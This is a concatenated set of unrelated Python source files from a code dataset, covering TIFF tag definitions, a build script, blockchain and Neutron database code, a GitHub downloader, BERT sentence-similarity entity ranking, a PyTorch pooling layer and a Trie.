50711: {'name': 'CFALayout'},
50712: {'name': 'LinearizationTable'},
50713: {'name': 'BlackLevelRepeatDim'},
50714: {'name': 'BlackLevel'},
50715: {'name': 'BlackLevelDeltaH'},
50716: {'name': 'BlackLevelDeltaV'},
50717: {'name': 'WhiteLevel'},
50718: {'name': 'DefaultScale'},
50719: {'name': 'DefaultCropOrigin'},
50720: {'name': 'DefaultCropSize'},
50721: {'name': 'ColorMatrix1'},
50722: {'name': 'ColorMatrix2'},
50723: {'name': 'CameraCalibration1'},
50724: {'name': 'CameraCalibration2'},
50725: {'name': 'ReductionMatrix1'},
50726: {'name': 'ReductionMatrix2'},
50727: {'name': 'AnalogBalance'},
50728: {'name': 'AsShotNeutral'},
50729: {'name': 'AsShotWhiteXY'},
50730: {'name': 'BaselineExposure'},
50731: {'name': 'BaselineNoise'},
50732: {'name': 'BaselineSharpness'},
50733: {'name': 'BayerGreenSplit'},
50734: {'name': 'LinearResponseLimit'},
50735: {'name': 'CameraSerialNumber'},
50736: {'name': 'LensInfo'},
50737: {'name': 'ChromaBlurRadius'},
50738: {'name': 'AntiAliasStrength'},
50739: {'name': 'ShadowScale'},
50740: {'name': 'DNGPrivateData'},
50741: {'name': 'MakerNoteSafety'},
50778: {'name': 'CalibrationIlluminant1'},
50779: {'name': 'CalibrationIlluminant2'},
50780: {'name': 'BestQualityScale'},
50784: {'name': 'AliasLayerMetadata'},
50781: {'name': 'RAWDATAUNIQUEID'},
50827: {'name': 'ORIGINALRAWFILENAME'},
50828: {'name': 'ORIGINALRAWFILEDATA'},
50829: {'name': 'ACTIVEAREA'},
50830: {'name': 'MASKEDAREAS'},
50831: {'name': 'ASSHOTICCPROFILE'},
50832: {'name': 'ASSHOTPREPROFILEMATRIX'},
50833: {'name': 'CURRENTICCPROFILE'},
50834: {'name': 'CURRENTPREPROFILEMATRIX'},
50844: {'name': 'RPCCOEFFICIENT'},
50908: {'name': 'TIFF_RSID'},
50909: {'name': 'GEO_METADATA'},
50933: {'name': 'TIFFTAG_EXTRACAMERAPROFILES'},
# Hamamatsu tags
65324: {'name': 'NDPI_OffsetHighBytes', 'source': 'tifffile.py'},
65325: {'name': 'NDPI_ByteCountHighBytes', 'source': 'tifffile.py'},
65420: {'name': 'NDPI_FORMAT_FLAG', 'source': 'hamamatsu'},
65421: {'name': 'NDPI_SOURCELENS', 'altnames': {'NDPI_Magnification'}, 'source': 'hamamatsu'},
65422: {'name': 'NDPI_XOFFSET', 'source': 'hamamatsu'},
65423: {'name': 'NDPI_YOFFSET', 'source': 'hamamatsu'},
65424: {'name': 'NDPI_FOCAL_PLANE', 'altnames': {'NDPI_ZOFFSET'}, 'source': 'hamamatsu'},
65425: {'name': 'NDPI_TissueIndex', 'source': 'tifffile.py'},
65426: {'name': 'NDPI_MCU_STARTS', 'source': 'hamamatsu'},
65427: {'name': 'NDPI_REFERENCE', 'altnames': {'NDPI_SlideLabel'}, 'source': 'hamamatsu'},
65428: {'name': 'NDPI_AuthCode', 'source': 'tifffile.py'},
65432: {'name': 'NDPI_McuStartsHighBytes', 'source': 'tifffile.py'},
65434: {'name': 'NDPI_CHANNEL', 'altnames': {'NDPI_Fluorescence'}, 'source': 'hamamatsu'},
65435: {'name': 'NDPI_ExposureRatio', 'source': 'tifffile.py'},
65436: {'name': 'NDPI_RedMultiplier', 'source': 'tifffile.py'},
65437: {'name': 'NDPI_GreenMultiplier', 'source': 'tifffile.py'},
65438: {'name': 'NDPI_BlueMultiplier', 'source': 'tifffile.py'},
65439: {'name': 'NDPI_FocusPoints', 'source': 'tifffile.py'},
65440: {'name': 'NDPI_FocusPointRegions', 'source': 'tifffile.py'},
65441: {'name': 'NDPI_CaptureMode', 'source': 'tifffile.py'},
65442: {'name': 'NDPI_NDPSN', 'altnames': {'NDPI_ScannerSerialNumber'}, 'source': 'hamamatsu'}, # not official name
65444: {'name': 'NDPI_JpegQuality', 'source': 'tifffile.py'},
65445: {'name': 'NDPI_RefocusInterval', 'source': 'tifffile.py'},
65446: {'name': 'NDPI_FocusOffset', 'source': 'tifffile.py'},
65447: {'name': 'NDPI_BlankLines', 'source': 'tifffile.py'},
65448: {'name': 'NDPI_FirmwareVersion', 'source': 'tifffile.py'},
65449: {'name': 'NDPI_PROPERTY_MAP', 'source': 'hamamatsu'},
65450: {'name': 'NDPI_LabelObscured', 'source': 'tifffile.py'},
65451: {'name': 'NDPI_EMISSION_WAVELENGTH', 'source': 'hamamatsu'},
65453: {'name': 'NDPI_LampAge', 'source': 'tifffile.py'},
65454: {'name': 'NDPI_ExposureTime', 'source': 'tifffile.py'},
65455: {'name': 'NDPI_FocusTime', 'source': 'tifffile.py'},
65456: {'name': 'NDPI_ScanTime', 'source': 'tifffile.py'},
65457: {'name': 'NDPI_WriteTime', 'source': 'tifffile.py'},
65458: {'name': 'NDPI_FullyAutoFocus', 'source': 'tifffile.py'},
65500: {'name': 'NDPI_DefaultGamma', 'source': 'tifffile.py'},
# End Hamamatsu tags
65535: {'name': 'DCSHUESHIFTVALUES'},
})
Tag.SubIFD.tagset = Tag
Tag.GlobalParametersIFD.tagset = Tag
| StarcoderdataPython |
3346268 | #!/usr/bin/env python3
#coding: utf-8
import licant
import licant.install
from licant.cxx_modules import application
from licant.libs import include
import os
defines = ["NOTRACE=1"]
licant.libs.include("crow")
application("crowrequest",
sources = [
"main.cpp"
],
mdepends=["crow", "crow.udpgate"],
defines = defines,
cxx_flags = "-Wextra -Wall",
libs = ["pthread", "readline", "igris", "nos"],
cxxstd = "c++17"
)
licant.install.install_application(
tgt="install_crowrequest",
src="crowrequest",
dst="crowrequest")
if __name__ == "__main__":
licant.install.install_application(
tgt="install",
src="crowrequest",
dst="crowrequest")
licant.ex("crowrequest") | StarcoderdataPython |
1616007 | from __future__ import annotations
import asyncio
import typing
from ctc import spec
from ... import management
from ... import connect_utils
from ... import intake_utils
from . import blocks_statements
from ..block_timestamps import block_timestamps_statements
async def async_intake_block(
block: spec.Block,
network: spec.NetworkReference,
) -> None:
"""intake block and extract relevant information to db tables
under normal operation should store raw block or block timestamp, noth both
"""
block_coroutine = async_intake_raw_block(
block=block,
network=network,
)
timestamp_coroutine = async_intake_block_timestamp(
block=block,
network=network,
)
await asyncio.gather(
block_coroutine,
timestamp_coroutine,
)
async def async_intake_raw_block(
block: spec.Block,
network: spec.NetworkReference,
) -> None:
# check whether to intake
if not management.get_active_schemas().get('blocks'):
return
if not await intake_utils.async_is_block_fully_confirmed(
block=block, network=network
):
return
# store in db
engine = connect_utils.create_engine(
schema_name='block_timestamps',
network=network,
)
if engine is None:
return
with engine.begin() as conn:
await blocks_statements.async_upsert_block(
conn=conn,
block=block,
network=network,
)
async def async_intake_block_timestamp(
block: spec.Block | None,
*,
block_number: int | None = None,
timestamp: int | None = None,
network: spec.NetworkReference,
) -> None:
if block_number is None or timestamp is None:
if block is None:
raise Exception('must specify block or block_number and timestamp')
block_number = block['number']
timestamp = block['timestamp']
# check whether to intake
if not management.get_active_schemas().get('block_timestamps'):
return
if not await intake_utils.async_is_block_fully_confirmed(
block=block_number, network=network
):
return
# store in db
engine = connect_utils.create_engine(
schema_name='block_timestamps',
network=network,
)
if engine is None:
return
with engine.begin() as conn:
await block_timestamps_statements.async_upsert_block_timestamp(
conn=conn,
block_number=block_number,
timestamp=timestamp,
)
async def async_intake_blocks(
blocks: typing.Sequence[spec.Block],
network: spec.NetworkReference,
) -> None:
blocks_coroutine = async_intake_raw_blocks(blocks=blocks, network=network)
timestamps_coroutine = async_intake_block_timestamps(
blocks=blocks, network=network
)
await asyncio.gather(blocks_coroutine, timestamps_coroutine)
async def async_intake_raw_blocks(
blocks: typing.Sequence[spec.Block],
network: spec.NetworkReference,
) -> None:
if not management.get_active_schemas().get('blocks'):
return
confirmed = await intake_utils.async_filter_fully_confirmed_blocks(
blocks=blocks,
network=network,
)
if len(confirmed) > 0:
engine = connect_utils.create_engine(schema_name='blocks', network=network)
if engine is None:
return
with engine.begin() as conn:
await blocks_statements.async_upsert_blocks(
conn=conn,
blocks=confirmed,
network=network,
)
async def async_intake_block_timestamps(
blocks: typing.Sequence[spec.Block] | None = None,
*,
block_timestamps: typing.Mapping[int, int] | None = None,
network: spec.NetworkReference,
) -> None:
if blocks is not None and block_timestamps is not None:
raise Exception('cannot specify both blocks and block_timestamps')
if not management.get_active_schemas().get('block_timestamps'):
return
# determine which blocks have enough confirmations
if blocks is not None:
confirmed_blocks = (
await intake_utils.async_filter_fully_confirmed_blocks(
blocks=blocks,
network=network,
)
)
if len(confirmed_blocks) == 0:
return
confirmed_block_timestamps = None
elif block_timestamps is not None:
confirmed_numbers = (
await intake_utils.async_filter_fully_confirmed_blocks(
blocks=list(block_timestamps.keys()),
network=network,
)
)
if len(confirmed_numbers) == 0:
return
confirmed_block_timestamps = {
number: block_timestamps[number] for number in confirmed_numbers
}
confirmed_blocks = None
else:
raise Exception('specify either blocks or block_timestamps')
# store in database
engine = connect_utils.create_engine(
schema_name='block_timestamps',
network=network,
)
if engine is None:
return
with engine.begin() as conn:
await block_timestamps_statements.async_upsert_block_timestamps(
conn=conn,
blocks=confirmed_blocks,
block_timestamps=confirmed_block_timestamps,
)
#
# # second draft
#
# async def async_intake_blocks(
# blocks: typing.Sequence[spec.Block],
# provider: spec.ProviderSpec = None,
# ) -> None:
# """intake block and extract relevant information to db tables"""
# active_block_schemas = get_active_schemas('block')
# if len(active_block_schemas) == 0:
# return
# intake_blocks = await async_should_intake_blocks(
# blocks=blocks, provider=provider
# )
# if len(intake_blocks) > 0:
# with engine.begin() as conn:
# coroutines = []
# for schema in active_block_schemas:
# if schema == 'blocks':
# coroutine = db_statements.async_upsert_blocks(
# conn=conn,
# blocks=intake_blocks,
# )
# coroutines.append(coroutine)
# elif schema == 'block_timestamps':
# coroutine = db_statements.async_upsert_blocks_timestamp(
# conn=conn,
# blocks=should_upsert_block_timestamps,
# )
# coroutines.append(coroutine)
# elif schema == 'block_gas_stats':
# coroutine = db_statements.async_upsert_blocks_gas_stats(
# conn=conn,
# blocks=should_upsert_blocks_gas_stats,
# )
# coroutines.append(coroutine)
# else:
# raise Exception('unknown schema: ' + str(schema))
# await asyncio.gather(*coroutines)
# async def async_should_intake_raw_block(block, network):
# # check whether already stored
# db_statements.does_block_exist()
# async def async_should_intake_blocks(blocks, provider):
# required_confirmations = management.get_required_confirmations(
# provider=provider
# )
# latest_block = None
# latest_block = await rpc.async_eth_block_number(provider=provider)
# intake_blocks = []
# for block in blocks:
# pass
# if block['number'] <= max_block - required_confirmations:
# return True
# else:
# latest_block = await rpc.async_eth_block_number(provider=provider)
# return block['number'] <= latest_block - min_confirmations
##
## # old
##
# async def async_intake_block(
# block: spec.Block,
# provider: spec.ProviderSpec = None,
# ) -> None:
# """intake block and extract relevant information to db tables"""
# # determine whether to store block
# network = rpc.get_provider_network(provider=provider)
# min_confirmations = management.get_min_confirmations(
# schema='block_timestamps',
# network=network,
# )
# engine = connect_utils.create_engine(
# schema='block_timestamps',
# network=network,
# )
# if engine is None:
# return
# check_if_exists = False
# with engine.connect() as conn:
# if (
# check_if_exists
# and db_statements.get_block_timestamp(
# conn=conn, block_number=block['number']
# )
# is not None
# ):
# store = False
# else:
# max_block = db_statements.get_max_block_number(conn=conn, network=network)
# if block['number'] <= max_block - min_confirmations:
# store = True
# else:
# latest_block = await rpc.async_eth_block_number(
# provider=provider,
# )
# store = block['number'] <= latest_block - min_confirmations
# # store data in db
# if store:
# with engine.begin() as conn:
# db_statements.set_block_timestamp(
# conn=conn,
# block_number=block['number'],
# timestamp=block['timestamp'],
# )
# async def async_intake_blocks(
# blocks: typing.Sequence[spec.Block],
# provider: spec.ProviderSpec = None,
# ) -> None:
# """
# TODO: database should store a max_complete_block number
# - indicates that ALL blocks below this height are stored
# - enables not re-storing anything below this height upon intake
# """
# # determine whether to store block
# network = rpc.get_provider_network(provider=provider)
# min_confirmations = management.get_min_confirmations(
# schema='block_timestamps',
# network=network,
# )
# engine = connect_utils.create_engine(
# schema='block_timestamps',
# network=network,
# )
# if engine is None:
# return
# with engine.connect() as conn:
# max_intake_block = max(block['number'] for block in blocks)
# max_stored_block = db_statements.get_max_block_number(
# conn=conn, network=network
# )
# if max_intake_block <= max_stored_block - min_confirmations:
# store_blocks = blocks
# else:
# latest_block = await rpc.async_eth_block_number(
# provider=provider,
# )
# store_blocks = [
# block
# for block in blocks
# if block['number'] <= latest_block - min_confirmations
# ]
# # store data in db
# if len(store_blocks) > 0:
# block_timestamps = {
# block['number']: block['timestamp'] for block in store_blocks
# }
# with engine.begin() as conn:
# db_statements.set_block_timestamps(
# conn=conn,
# block_timestamps=block_timestamps,
# ) | StarcoderdataPython |
1618722 | <reponame>noironetworks/apic-ml2-driver
# Copyright (c) 2017 Cisco Systems Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.db import model_base
import sqlalchemy as sa
from apic_ml2.neutron.extensions import cisco_apic
from apic_ml2.neutron.extensions import cisco_apic_l3
class NetworkExtensionDb(model_base.BASEV2):
__tablename__ = 'apic_ml2_network_extensions'
network_id = sa.Column(
sa.String(36), sa.ForeignKey('networks.id', ondelete="CASCADE"),
primary_key=True)
allow_route_leak = sa.Column(sa.Boolean)
class RouterExtensionDb(model_base.BASEV2):
__tablename__ = 'apic_ml2_router_extensions'
router_id = sa.Column(
sa.String(36), sa.ForeignKey('routers.id', ondelete="CASCADE"),
primary_key=True)
use_routing_context = sa.Column(
sa.String(36), sa.ForeignKey('routers.id', ondelete="RESTRICT"))
class ExtensionDbMixin(object):
def _set_if_not_none(self, res_dict, res_attr, db_attr):
if db_attr is not None:
res_dict[res_attr] = db_attr
def get_network_extn_db(self, session, network_id):
db_obj = (session.query(NetworkExtensionDb).filter_by(
network_id=network_id).first())
result = {}
if db_obj:
self._set_if_not_none(result, cisco_apic.ALLOW_ROUTE_LEAK,
db_obj['allow_route_leak'])
return result
def set_network_extn_db(self, session, network_id, res_dict):
db_obj = (session.query(NetworkExtensionDb).filter_by(
network_id=network_id).first())
db_obj = db_obj or NetworkExtensionDb(network_id=network_id)
if cisco_apic.ALLOW_ROUTE_LEAK in res_dict:
db_obj['allow_route_leak'] = res_dict[cisco_apic.ALLOW_ROUTE_LEAK]
session.add(db_obj)
def get_router_extn_db(self, session, router_id):
db_obj = (session.query(RouterExtensionDb).filter_by(
router_id=router_id).first())
result = {}
if db_obj:
self._set_if_not_none(result, cisco_apic_l3.USE_ROUTING_CONTEXT,
db_obj['use_routing_context'])
return result
def set_router_extn_db(self, session, router_id, res_dict):
if res_dict.get(cisco_apic_l3.USE_ROUTING_CONTEXT):
db_obj = RouterExtensionDb(router_id=router_id)
db_obj['use_routing_context'] = res_dict[
cisco_apic_l3.USE_ROUTING_CONTEXT]
session.add(db_obj)
| StarcoderdataPython |
154386 | ##==============================================================#
## SECTION: Imports #
##==============================================================#
import io
import sys
import os.path as op
import auxly.filesys as fsys
import qprompt
import requests
##==============================================================#
## SECTION: Setup #
##==============================================================#
# Handle Python 2/3 differences.
if sys.version_info < (3, 0):
reload(sys)
sys.setdefaultencoding("utf-8")
from urllib import unquote
else:
from urllib.parse import unquote
##==============================================================#
## SECTION: Global Definitions #
##==============================================================#
GHAPI = "https://api.github.com/repos/"
GHURL = "https://github.com/"
GHRAW = "https://raw.githubusercontent.com/"
##==============================================================#
## SECTION: Function Definitions #
##==============================================================#
def is_github(src):
if src.startswith(GHAPI):
return True
if src.startswith(GHURL):
return True
if src.startswith(GHRAW):
return True
return False
def prep_url(url):
"""Preps the given URL and returns either an API URL (for directories) or a
raw content URL (for files)."""
if url.startswith(GHURL):
tok = url.split("/")[3:]
if len(tok) > 4:
name = tok[-1]
else:
name = tok[1]
if 2 == len(tok):
tok.append("tree")
if 3 == len(tok):
tok.append("master")
if "blob" == tok[2]:
url = GHRAW
url += "{0}/{1}/{3}/".format(*tok)
url += "/".join(tok[4:])
elif "tree" == tok[2]:
url = GHAPI
url += "{0}/{1}/contents/".format(*tok)
url += "/".join(tok[4:])
url += "?ref=" + tok[3]
else:
tok = url.split("/")
name = tok[-1]
return url,name
def is_file(url):
"""Checks if the given URL is for a file and returns the filename if so;
returns None otherwise."""
url,name = prep_url(url)
if url.startswith(GHRAW):
return unquote(name)
def is_dir(url):
if is_file(url):
return None
return unquote(url.split("/")[-1])
def download(srcurl, dstpath=None):
"""Handles downloading files/dirs from the given GitHub repo URL to the
given destination path."""
def download_api(srcurl, dstdir):
items = requests.get(srcurl).json()
if op.isfile(dstdir):
raise Exception("DestDirIsFile")
fsys.makedirs(dstdir, ignore_extsep=True)
if isinstance(items, dict) and "message" in items.keys():
qprompt.error(items['message'])
return
for item in items:
if "file" == item['type']:
fpath = op.join(dstdir, item['name'])
with io.open(fpath, "w", encoding="utf-8") as fo:
text = requests.get(item['download_url']).text
fo.write(text)
else:
download_api(item['url'], op.join(dstdir, item['name']))
def download_raw(srcurl, dstfile):
fsys.makedirs(dstfile)
if op.isdir(dstfile):
dstfile = op.join(dstfile, srcurl.split("/")[-1])
dstfile = unquote(dstfile)
with io.open(dstfile, "w") as fo:
fo.write(requests.get(srcurl).text)
url,name = prep_url(srcurl)
if not dstpath:
dstpath = op.join(op.abspath("."), name)
dstpath = op.abspath(dstpath)
if url.startswith(GHAPI):
download_api(url, dstpath)
else:
download_raw(url, dstpath)
##==============================================================#
## SECTION: Main Body #
##==============================================================#
if __name__ == '__main__':
pass
| StarcoderdataPython |
3381338 | <reponame>PythonDataIntegrator/pythondataintegrator
from injector import inject
from sqlalchemy import func
from sqlalchemy.orm import Query
from domain.common.specifications.OrderBySpecification import OrderBySpecification
from infrastructure.data.RepositoryProvider import RepositoryProvider
from infrastructure.dependency.scopes import IScoped
from domain.operation.GetDataOperationJobExecutionIntegrationList.GetDataOperationJobExecutionIntegrationListQuery import \
GetDataOperationJobExecutionIntegrationListQuery
from models.dao.common import Status
from models.dao.connection import Connection
from models.dao.integration import DataIntegrationConnection, DataIntegration
from models.dao.operation import DataOperationIntegration, DataOperationJobExecutionIntegration, \
DataOperationJobExecutionIntegrationEvent
class GetDataOperationJobExecutionIntegrationListSpecifications(IScoped):
@inject
def __init__(self,
repository_provider: RepositoryProvider,
):
self.repository_provider = repository_provider
def __specified_query(self, query: GetDataOperationJobExecutionIntegrationListQuery) -> Query:
total_affected_row_query = self.repository_provider.query(
DataOperationJobExecutionIntegration.Id,
func.coalesce(func.sum(DataOperationJobExecutionIntegrationEvent.AffectedRowCount), 0).label(
"AffectedRowCount")) \
.join(DataOperationJobExecutionIntegration.DataOperationJobExecutionIntegrationEvents).group_by(
DataOperationJobExecutionIntegration.Id)
total_affected_row_subquery = total_affected_row_query.subquery()
source_connection_query = self.repository_provider.query(
DataIntegrationConnection,
DataIntegrationConnection.DataIntegrationId,
Connection.Name.label(
"ConnectionName")
) \
.join(Connection, DataIntegrationConnection.ConnectionId == Connection.Id) \
.filter(DataIntegrationConnection.IsDeleted == 0) \
.filter(DataIntegrationConnection.SourceOrTarget == 0)
source_connection_subquery = source_connection_query.subquery()
target_connection_query = self.repository_provider.query(
DataIntegrationConnection,
DataIntegrationConnection.DataIntegrationId,
Connection.Name.label(
"ConnectionName")
) \
.join(Connection, DataIntegrationConnection.ConnectionId == Connection.Id) \
.filter(DataIntegrationConnection.IsDeleted == 0) \
.filter(DataIntegrationConnection.SourceOrTarget == 1)
target_connection_subquery = target_connection_query.subquery()
specified_query = self.repository_provider.query(
DataOperationJobExecutionIntegration,
DataOperationIntegration,
source_connection_subquery.c.ConnectionName.label("SourceConnectionName"),
target_connection_subquery.c.ConnectionName.label("TargetConnectionName"),
total_affected_row_subquery.c.AffectedRowCount.label("AffectedRowCount")
) \
.join(DataOperationIntegration, isouter=True) \
.join(DataIntegration, isouter=True) \
.join(Status, isouter=True) \
.join(source_connection_subquery,
source_connection_subquery.c.DataIntegrationId == DataIntegration.Id, isouter=True) \
.join(target_connection_subquery,
target_connection_subquery.c.DataIntegrationId == DataIntegration.Id, isouter=True) \
.join(total_affected_row_subquery,
total_affected_row_subquery.c.Id == DataOperationJobExecutionIntegration.Id, isouter=True)
specified_query = specified_query.filter(
DataOperationJobExecutionIntegration.DataOperationJobExecutionId == query.request.ExecutionId) \
.order_by(DataOperationIntegration.Order)
return specified_query
def specify(self, query: GetDataOperationJobExecutionIntegrationListQuery) -> Query:
data_query = self.__specified_query(query=query)
return data_query
def count(self, query: GetDataOperationJobExecutionIntegrationListQuery) -> Query:
return self.__specified_query(query=query).count()
| StarcoderdataPython |
3240533 | <filename>code/sentence_embedding_with_bert_ranking.py
'''
Rank the entities based on the sentence similary
Steps
1. Load sentence embedding first >> DONE
2. Read the settings file and process it >> DONE
3. Do embedding of question q >> TRIVIAL
4. Do embedding of sentences containing the entities >> WIP
5. Do coreference resolution
6. Save the file >> TRIVIAL
'''
'''
Step 1: Load sentence embeddings
'''
# import basic libraries
from random import randint
import numpy as np
import torch
import scipy
import json
import unicodedata
def remove_accented_chars(text):
text = unicodedata.normalize('NFKD', text).encode(
'ascii', 'ignore').decode('utf-8', 'ignore')
return text
# Load model
from sentence_transformers import SentenceTransformer
model = SentenceTransformer('bert-base-nli-mean-tokens')
def cosine(u, v):
return np.dot(u, v) / (np.linalg.norm(u) * np.linalg.norm(v))
print(cosine(model.encode(['the cat eats.'])[0], model.encode(['the cat drinks.'])[0]))
"""
Read the entities and settings file
"""
import yaml
config_file_name = 'configure.yml'
# defined it here too
with open(config_file_name) as config_file:
config_file_values = yaml.load(config_file)
# Get Entitites for each question
qid = config_file_values["qid"]
quesType = config_file_values["quesType"]
quesPathStart = config_file_values["quesPathStart"]
corpusPathStart = config_file_values["copusPathStart"]
resultPathStart = config_file_values["resultPathStart"]
samplingType = config_file_values["samplingType"]
from extract_entities import get_named_entities, get_named_entities_with_sentence
from pprint import pprint
from common import get_corpus_path, get_question_and_gold_answer
import pickle
import json
import sys
import en_core_web_sm
nlp = en_core_web_sm.load()
nlp.max_length = 1030000
# Get Question type from dump file
map_qid_qtype_pair = {}
input_file_name = "results/quesType_finetune_" + quesType
with open(input_file_name, 'r') as input_file:
lines = input_file.readlines()
for line in lines:
question_id = line.split("\t")[0]
spacy_tag_ques_type = line.split("\t")[2]
map_qid_qtype_pair[question_id] = spacy_tag_ques_type
#print(map_qid_qtype_pair)
# result file map for qid and top ranked entities
result_file_qid_answers = {}
for i in range(150):
i = 121
ques_id = int(qid) + i
question, answer, ques_exact_id = get_question_and_gold_answer( ques_id, quesType, quesPathStart)
#if i == 121:
# continue
# hack: ques_id looks like cqw-150-q001, corpus id 001, extract from this
corpus_ques_id = ques_exact_id.split('-')[2][1:]
print(corpus_ques_id)
corpus_path = get_corpus_path(corpus_ques_id, quesType, corpusPathStart, samplingType)
#tags = get_named_entities(ques_id, quesType, quesPathStart, corpus_path)
tags, ent_sentence_map = get_named_entities_with_sentence(ques_id, quesType, quesPathStart, corpus_path)
#pprint(tags)
# convert the tags into list (ordered way)
tags_list = sorted(tags.items(), key=lambda pair: pair[1], reverse=True)
"""
output_file_name = "results/all_named_entities_" + quesType
question, answer, ques_exact_id = get_question_and_gold_answer( ques_id, quesType, quesPathStart)
with open( output_file_name , 'a+') as output:
output.write(question + "\t" + ques_exact_id + "\n")
output.write("Gold Answer : "+ " | ".join(answer) + "\n")
output.write(" \n ".join(map(str, tags_list)))
output.write("\n")
"""
# Filter questions based on type
spacy_tags_ques_type_list = map_qid_qtype_pair[ques_exact_id].split(" | ")
#filtered_tag_list = [tag_items for tag_items in tags_list if tags_list[0] in spacy_tags_ques_type_list]
# filter the tags based on the question type tag
filtered_tag_list = []
for tag_items in tags_list:
ent, tag = tag_items[0]
if(tag in spacy_tags_ques_type_list):
filtered_tag_list.append(tag_items)
"""
output_file_name = "results/filtered_named_entities_" + quesType
with open( output_file_name , 'a+') as output:
output.write(question + "\t" + ques_exact_id + "\n")
output.write("Gold Answer : "+ " | ".join(answer) + "\n")
output.write(" \n ".join(map(str, filtered_tag_list)))
output.write("\n")
#print(filtered_tag_list)
"""
#print("Filtered Tag List : ")
#print(filtered_tag_list)
doc_content = []
# Old Code extracting sentences
"""
for tag_items in filtered_tag_list:
ent, tag = tag_items[0]
max_cosine_value = -1
sentences = []
str_sent = ""
#print(doc_content[i])
for i in range(0, 10):
sentences += get_sentence_from_entity((doc_content[i]), (ent), tag)
#print(sentences)
for sentence in sentences:
#print(sentence)
#print(sentence , cosine(model.encode([str.lower(question)])[0], model.encode([str(sentence)])[0]))
cosine_value = cosine(model.encode([str.lower(question)])[0], model.encode([str(sentence)])[0])
if cosine_value > max_cosine_value :
max_cosine_value = cosine_value
str_sent = str(sentence)
print(str_sent, max_cosine_value, ent, tag)
"""
result_list = []
# run for top k filtered tag list
topK_cut_off = 100
tag_count = 0
emb_len = 768
for tag_items in filtered_tag_list:
tuple_val = tag_items[0]
max_cosine_value = -1
str_sent = ""
#print(ent_sentence_map[tuple_val])
sentence_list = ent_sentence_map[tuple_val]
#for sentence in sentence_list:
#print(sentence_list)
#print("Sentence len: ", len(sentence_list))
sentence_embeddings = model.encode(sentence_list)
#print("sent emb len", len(sentence_embeddings))
#print("Sentence Shape : ", sentence_embeddings[0].shape)
ques_embedding = model.encode(question)
#print("Ques shape: ", ques_embedding[0].shape)
#print(len(ques_embedding))
#sys.exit(1)
"""
for sentence, embedding in zip(sentence_list, sentence_embeddings):
print("Sentence:", sentence)
print("Embedding:", embedding)
print("")
"""
#print(ques_embedding.shape)
sentence_embeddings = np.stack(sentence_embeddings, axis = 0)
#print(type(sentence_embeddings))
#print(sentence_embeddings.shape)
ques_embedding = ques_embedding[0].reshape(emb_len, 1).transpose()
#print("Ques shape: ", ques_embedding[0].shape)
#print(sentence_embeddings.shape)
#print(ques_embedding.shape)
cosine_value = scipy.spatial.distance.cdist(ques_embedding, sentence_embeddings, "cosine")
cosine_sim = 1 - cosine_value
#print(cosine_sim)
max_cosine_value = cosine_sim.max()
#cosine_value = cosine(model.encode([str.lower(question)])[0], model.encode([str.lower(sentence)])[0])
#if cosine_value > max_cosine_value :
# max_cosine_value = cosine_value
# str_sent = str(sentence)
#max_cosine_value = 1
#sys.exit(1)
if max_cosine_value != -1 :
doc_freq = tag_items[1]
doc_number = 10
score_tag_tuple = ((doc_freq / doc_number)* max_cosine_value,tuple_val)
result_list.append(score_tag_tuple)
#print(str_sent, max_cosine_value, tuple_val) # print the max score of sentence and tuples
tag_count += 1
if tag_count >= topK_cut_off: # run for top k entities, change topk_cut_off if we want to include more
break
result_list = sorted(result_list, key=lambda x: x[0], reverse = True) # sort the list based on cosine values
#exit(1)
rank_map = {}
top_scored_result = []
temp = []
for tag_items in result_list:
value = tag_items[0]
if value not in rank_map:
rank_map[value] = 1
if len(temp) != 0:
top_scored_result.append(" | ".join(temp))
temp.clear()
if len(rank_map) >5:
break
ent, tag = tag_items[1]
temp.append(str(ent))
result_file_qid_answers[ques_exact_id] = top_scored_result
#print((result_file_qid_answers))
#exit(1)
if i %10 == 0:
print("Processed %d queries" % i)
"""
top_scored_result = []
rank = 1
rank_map = {}
temp = []
for tag_items in filtered_tag_list:
value = tag_items[1]
#print(value)
#exit(1)
if value not in rank_map :
rank_map[value] = 1
if len(temp)!= 0 :
top_scored_result.append(" | ".join(temp))
temp.clear()
if len(rank_map) > 5 :
break
ent, tag = tag_items[0]
temp.append(str.lower(ent))
result_file_qid_answers[ques_exact_id] = top_scored_result
#print(len(result_file_qid_answers))
#exit(1)
# get the only top scored named entities
"""
break
# Remaining entities rank them based on some order
json_object = json.dumps(result_file_qid_answers, indent = 4)
with open(resultPathStart + samplingType + "_part_" + quesType + ".json" , "w+") as outfile:
outfile.write(json_object)
# TODO : incorporate context while ranking
| StarcoderdataPython |
3354613 | # Modifications Copyright 2022 Tau
# Copyright (c) OpenMMLab. All rights reserved.
import torch
import torch.nn as nn
class GlobalAveragePooling(nn.Module):
"""Global Average Pooling neck.
Note that we use `view` to remove extra channel after pooling. We do not
use `squeeze` as it will also remove the batch dimension when the tensor
has a batch dimension of size 1, which can lead to unexpected errors.
"""
def __init__(self, output_size=(1, 1)):
super().__init__()
self.gap = nn.AdaptiveAvgPool2d(output_size)
def init_weights(self):
pass
def forward(self, inputs):
if isinstance(inputs, tuple):
outs = tuple([self.gap(x) for x in inputs])
outs = tuple(
[out.view(x.size(0), -1) for out, x in zip(outs, inputs)])
elif isinstance(inputs, list):
outs = [self.gap(x) for x in inputs]
outs = [out.view(x.size(0), -1) for out, x in zip(outs, inputs)]
elif isinstance(inputs, torch.Tensor):
outs = self.gap(inputs)
outs = outs.view(inputs.size(0), -1)
else:
raise TypeError('neck inputs should be tuple or torch.tensor')
return outs | StarcoderdataPython |
3260283 | <filename>Implement Trie (Prefix Tree).py
class TrieNode:
def __init__(self):
self.next = {}
self.isWord = False
class Trie:
def __init__(self):
self.root = TrieNode()
def insert(self, word):
n = self.root
for w in word:
if w not in n.next:
n.next[w] = TrieNode()
n = n.next[w]
n.isWord = True
def search(self, word):
n = self.root
for w in word:
if w not in n.next:
return False
else:
n = n.next[w]
return n.isWord
def startsWith(self, prefix):
n = self.root
for w in prefix:
if w not in n.next:
return False
else:
n = n.next[w]
return True
if __name__ == '__main__':
trie = Trie()
trie.insert('apple')
print(trie.search('apple')) # True
print(trie.search('app')) # False
print(trie.startsWith('app')) # True
trie.insert('app')
